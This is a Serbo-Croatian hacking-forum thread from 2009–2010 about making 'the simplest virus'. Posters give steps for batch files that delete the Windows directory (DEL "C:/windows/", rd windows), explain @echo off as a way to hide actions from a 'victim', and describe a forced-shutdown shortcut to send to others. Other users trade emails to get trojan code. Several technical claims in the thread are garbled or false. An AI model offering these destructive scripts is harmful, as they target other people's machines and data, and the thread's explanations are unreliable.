Hakovanje
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Najprostiji virus

+4
paki
Wolf king
vuksavucijaka
Admin
8 posters

Go down

Najprostiji virus Empty Najprostiji virus

Komentar  Admin Sun Mar 22, 2009 1:21 am

1. otvorite notepad
2. upisite ovo DEL "C:/windows/" - sa navodnicima
3. kliknite na file, pa save as
4. otvorice vam se novi prozorcic i na mjesto na kojem trebate napisati ime dadoteke, prepravite sa ".txt" u ".bat" .
NPR. (.txt) => (wirus.bat)

Admin
Admin

Broj komentara : 6
Join date : 2009-03-22

https://hakovanje.forumbo.net

Na vrh Go down

Najprostiji virus Empty dodatak

Komentar  vuksavucijaka Tue May 19, 2009 8:38 pm

AKO ZELITE DA STVARNO POSTANETE HACKER I NAUCITE NESTO O HACKANJU POSJETITE SLEDECU STRANICU:www.tulekusrcu.blogspot.com I VIDITE STA JE PRAVI HACKER
prvo ljudima treba objasniti sta rade a ne odma >otvorite notepad i pisite to,to,to
evo vam pravo obavjestenje**********

Mogu sadržavati DOS komande.
DOS nije ni malo sličan Windowsu pa ga nije lako koristiti. Zato je Micro$oft mali
mini-jezik nazvan "batch file". Batch fajlovi su fajlovi koji sadrze komande koje će kompjuter slijediti.
I ako kažemo da izbrišemo čitav harddisk on će poslušati naredbu. SAda, jezik je nešto najlakše što treba naučiti
na putu da postaneš haker. Samo trebaš da imaš talenta. Sada treba da naučiš komande, ja ću neke izlistati ovdje:

Najkorisnije komande su:(molim Vas otvorite još jedan notepad ili word pad i zapišite komande jer će Vam kasnije trebati)

@echo off - ova komanda će reći kompjuteru da ne pokazuje sve što radi u datom trenutku. Dobro ako ne želite da user sazna šta program radi.

echo text ovdje - ova komanda će izbaciti riječi text ovdje na ekran. Recimo ako želite da stavite "ti papcino" na žrtvin ekran, onda bi napisao echo ti papcino
Lagano, zar ne?

cd\ - ova komanda bi rekla kompjuteru da se vrati na harddrive (u većini slučajeva C:\). Većinu
vremena ćete koristiti ovo. Kasnije ćete vidjeti zašto.

cd direktorij - ovo otvara direktorij. Pa recimo da ste tipkali komandu cd\ prije. Sada ste u c:\ zbog cd\ komande, jel tako?Onda recite kompjuteru
cd windows i tada će kompjuter otvoriti direktorij windows sa c: drajva. (c:/windows, znate, najvažniji direktorij osim ako nemate linux.)


RD direktorij - ova komanda će izbrisati direktorij. Ovo je teško objasniti. Ako ste na c:/windows, i koristili ste komandu RD windows
E pa neće raditi glupko, zato što direktorij windows nije u direktoriju c:/windows/ . Jedini način da ovo radi jeste da budete u c:\ .
Zato što je direktorij windows u c:\ . Nadam se da se niste izgubili ili zbunili. Ali ovo je teško objasniti potpunim
početnicima, jer ako koristite windows već neko vrijeme ovako jednostavne komande bi trebali kopčati.
Ako još ne shvatate pošaljite mi email: sarajman00@hotmail.com pa ću Vam pokušati detaljnije objasniti.


@del fajl - ova komanda briše odredjeni fajl u odredjenom direktoriju pa ako ste npr u c:/windows/ bilo koji fajl mozete izbrisati kao npr. @del logo.sys


End - ova komanda završava i izlazi iz programa.




Sada kada znate osnovne komande možemo krenuti sa učenjem kako da ih pretvorimo u viruse.
Ja mislim da ljudi najbolje uče ako imaju primjer ispred sebe. Pa ću ja zato koristiti primjere.



Primjer br.1
---------------

@echo off
cd\
rd windows
echo TI glupane
echo hahahahhahaha
echo imam te
echo Vidimo se
echo Vozdrica
end
--------------

Hajmo sad ovo analizirati:
@echo off - govori kompjuter da ne izbacuje sve na ekran tako žrtva ništa neće znati šta se dešava. hehehe
cd\ govori da se pomjeri u c:\ drajv.
rd windows - govori da deletuje direktorij windows iz c:\ . I to znači vozdra Windows. hahaha
Ostale komande echo TI glupane....govore kompjuteru....pogodite šta.
End -završava program.

vuksavucijaka

Broj komentara : 1
Join date : 2009-05-19
Age : 29
Mjesto : SRPSKI BROD

http://www,tulekusrcu.blogspot.com

Na vrh Go down

Najprostiji virus Empty Shutdown

Komentar  Wolf king Sat Jul 04, 2009 8:23 pm

Desni klik na Desktop->New->Shortcut->

kod imena napiste : shutdown -s -t 100 -c "VIRUS"
-t znaci vreme izrazeno u sekundama [NARAVNO MZETE GA PROMENITI NAKOLIKO HOCETE.
-c znaci poruka odnosno "Message". Tu upisite bil koju poruku.
DA BI OVO ZAUSTAVLI IDITE U Start->Run-> i upisite: shutdown -a i pritisnite ENTER

Ovo i nije bas virus ali tako ga mozete poslati nekom kome zelite da iskljucite komp. Very Happy
Ovakvih virusa kao shutdown postoji dosta. Mozete naci neke komande u : C:\WINDOWS\system32
Srecno! lol!

Wolf king

Broj komentara : 3
Join date : 2009-07-04

Na vrh Go down

Najprostiji virus Empty Re: Najprostiji virus

Komentar  paki Mon Jul 06, 2009 10:23 am

1. otvorite notepad
2. upisite ovo DEL "C:/windows/" - sa navodnicima
3. kliknite na file, pa save as
4. otvorice vam se novi prozorcic i na mjesto na kojem trebate napisati ime dadoteke, prepravite sa ".txt" u ".bat" .
NPR. (.txt) => (wirus.bat)



ovo uopste nije virus.
i time mozes uhakovati necji komp ali to nije virus.
to je obicna opcija windowsa da se izbrise.
taj tekst pokrece proces reinstalacije a mogucnost da se sistem obara kao kod virusa omogucava "bat"
kada na toj opciji napisete "bat" onda dajete dozvolu kompjuteru da taj proces izvrsi bez ikakvog pitanja ili upuzorenja.
zato je i to alatka za hakovanje a ne virus.

na netu postoju puno ovakvih lazi i napravljene su samo da bi vi sami svoj komp. unistili.

paki

Broj komentara : 6
Join date : 2009-07-06
Mjesto : Beograd

http://exproclan.tk/

Na vrh Go down

Najprostiji virus Empty razmislite sta pravite pre nego sto pocnete!!!

Komentar  momca96'' Sat Feb 06, 2010 5:31 pm

Batalite te sitne lazne viruse od mog druga brat je haker.Pravi prave viruse a za to ti treba puno vremena ne mozes to da uradis tek tako.Za jedan virus trebe ti po 1mesec, naravno ako hoces nesto ozbiljnije za ove vase igrarije meni treba 1-2 minuta.Ali dobro ako vam je to zabavno onda ok.Ako hocete ja mogu da vam dam strukturu trojanca ali da to ne zloupotrebite;).

momca96''

Broj komentara : 1
Join date : 2010-02-06
Age : 28

Na vrh Go down

Najprostiji virus Empty Re: Najprostiji virus

Komentar  MrNeo Fri Feb 19, 2010 4:02 pm

moses li mi poslat taj sastav unaprijed xvala.moj email mrmatrixcode@gmail.com

MrNeo

Broj komentara : 1
Join date : 2010-02-19

Na vrh Go down

Najprostiji virus Empty Re: Najprostiji virus

Komentar  Haker Tue Jun 22, 2010 11:47 pm

Admin (citat):1. otvorite notepad
2. upisite ovo DEL "C:/windows/" - sa navodnicima
3. kliknite na file, pa save as
4. otvorice vam se novi prozorcic i na mjesto na kojem trebate napisati ime dadoteke, prepravite sa ".txt" u ".bat" .
NPR. (.txt) => (wirus.bat)
a sto da radim s tim wirusom...? izvnite sto smaram ja sam pocetnik...

Haker

Broj komentara : 4
Join date : 2010-06-22

Na vrh Go down

Najprostiji virus Empty Re: Najprostiji virus

Komentar  Haker Tue Jun 22, 2010 11:49 pm

momca96'' (citat):Batalite te sitne lazne viruse od mog druga brat je haker.Pravi prave viruse a za to ti treba puno vremena ne mozes to da uradis tek tako.Za jedan virus trebe ti po 1mesec, naravno ako hoces nesto ozbiljnije za ove vase igrarije meni treba 1-2 minuta.Ali dobro ako vam je to zabavno onda ok.Ako hocete ja mogu da vam dam strukturu trojanca ali da to ne zloupotrebite;).
moze to na moj e mail?? pls unapred hwalla...jkontic18@yahoo.com

Haker

Broj komentara : 4
Join date : 2010-06-22

Na vrh Go down

Najprostiji virus Empty Re: Najprostiji virus

Komentar  hacknoB Thu Aug 12, 2010 12:09 pm

vuksavucijaka (citat):AKO ZELITE DA STVARNO POSTANETE HACKER I NAUCITE NESTO O HACKANJU POSJETITE SLEDECU STRANICU:www.tulekusrcu.blogspot.com I VIDITE STA JE PRAVI HACKER
prvo ljudima treba objasniti sta rade a ne odma >otvorite notepad i pisite to,to,to
evo vam pravo obavjestenje**********

Mogu sadržavati DOS komande.
DOS nije ni malo sličan Windowsu pa ga nije lako koristiti. Zato je Micro$oft mali
mini-jezik nazvan "batch file". Batch fajlovi su fajlovi koji sadrze komande koje će kompjuter slijediti.
I ako kažemo da izbrišemo čitav harddisk on će poslušati naredbu. SAda, jezik je nešto najlakše što treba naučiti
na putu da postaneš haker. Samo trebaš da imaš talenta. Sada treba da naučiš komande, ja ću neke izlistati ovdje:

Najkorisnije komande su:(molim Vas otvorite još jedan notepad ili word pad i zapišite komande jer će Vam kasnije trebati)

@echo off - ova komanda će reći kompjuteru da ne pokazuje sve što radi u datom trenutku. Dobro ako ne želite da user sazna šta program radi.

echo text ovdje - ova komanda će izbaciti riječi text ovdje na ekran. Recimo ako želite da stavite "ti papcino" na žrtvin ekran, onda bi napisao echo ti papcino
Lagano, zar ne?

cd\ - ova komanda bi rekla kompjuteru da se vrati na harddrive (u većini slučajeva C:\). Većinu
vremena ćete koristiti ovo. Kasnije ćete vidjeti zašto.

cd direktorij - ovo otvara direktorij. Pa recimo da ste tipkali komandu cd\ prije. Sada ste u c:\ zbog cd\ komande, jel tako?Onda recite kompjuteru
cd windows i tada će kompjuter otvoriti direktorij windows sa c: drajva. (c:/windows, znate, najvažniji direktorij osim ako nemate linux.)


RD direktorij - ova komanda će izbrisati direktorij. Ovo je teško objasniti. Ako ste na c:/windows, i koristili ste komandu RD windows
E pa neće raditi glupko, zato što direktorij windows nije u direktoriju c:/windows/ . Jedini način da ovo radi jeste da budete u c:\ .
Zato što je direktorij windows u c:\ . Nadam se da se niste izgubili ili zbunili. Ali ovo je teško objasniti potpunim
početnicima, jer ako koristite windows već neko vrijeme ovako jednostavne komande bi trebali kopčati.
Ako još ne shvatate pošaljite mi email: sarajman00@hotmail.com pa ću Vam pokušati detaljnije objasniti.


@del fajl - ova komanda briše odredjeni fajl u odredjenom direktoriju pa ako ste npr u c:/windows/ bilo koji fajl mozete izbrisati kao npr. @del logo.sys


End - ova komanda završava i izlazi iz programa.




Sada kada znate osnovne komande možemo krenuti sa učenjem kako da ih pretvorimo u viruse.
Ja mislim da ljudi najbolje uče ako imaju primjer ispred sebe. Pa ću ja zato koristiti primjere.



Primjer br.1
---------------

@echo off
cd\
rd windows
echo TI glupane
echo hahahahhahaha
echo imam te
echo Vidimo se
echo Vozdrica
end
--------------

Hajmo sad ovo analizirati:
@echo off - govori kompjuter da ne izbacuje sve na ekran tako žrtva ništa neće znati šta se dešava. hehehe
cd\ govori da se pomjeri u c:\ drajv.
rd windows - govori da deletuje direktorij windows iz c:\ . I to znači vozdra Windows. hahaha
Ostale komande echo TI glupane....govore kompjuteru....pogodite šta.
End -završava program.
jel i to pamtimo kao i prvi virus (mislim kao .bat file)
i jel ima veze ako imamo dvije particije, mislim ako ''zrtva'' ima dvije particije??

hacknoB

Broj komentara : 1
Join date : 2010-08-11

Na vrh Go down

Najprostiji virus Empty Re: Najprostiji virus

Komentar  Sponsored content


Sponsored content


Na vrh Go down

Na vrh

- Similar topics

 
Permissions in this forum:
Ne možete odgovoriti na teme ili komentare u ovom forumu